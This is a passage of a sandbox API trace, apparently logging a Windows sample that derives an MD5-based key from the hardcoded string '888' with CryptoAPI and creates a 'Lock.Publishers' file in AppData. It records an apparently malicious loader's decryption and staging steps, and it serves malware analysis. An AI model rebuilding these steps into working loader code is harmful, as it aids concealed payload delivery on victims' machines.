hHeap=0x2af0000) returned 1 [0199.266] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.267] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0199.267] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0199.267] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0199.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0199.268] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0199.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0199.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.269] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0199.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0199.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.269] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0199.269] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.269] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.269] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.269] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0199.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0199.270] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bcd0) returned 1 [0199.270] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0199.270] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0199.270] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0199.270] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0199.270] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0199.271] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0199.271] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0199.271] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0199.288] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0199.288] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0199.288] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0199.288] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0199.288] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.288] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.288] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0199.288] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0199.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0199.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0199.288] CryptCreateHash (in: hProv=0xa7bcd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0199.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0199.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71aa8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0199.288] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0199.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaacf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0199.289] CryptHashData (hHash=0x9e2138, pbData=0x2a71af8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.289] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0199.289] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0199.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaaca8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0199.289] CryptDeriveKey (in: hProv=0xa7bcd0, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0199.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0199.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0199.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0199.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0199.290] CryptDestroyHash (hHash=0x9e2138) returned 1 [0199.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Publishers" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0199.291] GetLastError () returned 0x5 [0199.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0199.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0199.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0199.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0199.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0199.293] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0199.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0199.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Publishers" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.publishers"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0199.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0199.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0199.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0199.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.296] RtlAllocateHeap (HeapHandle=0x2af0000, 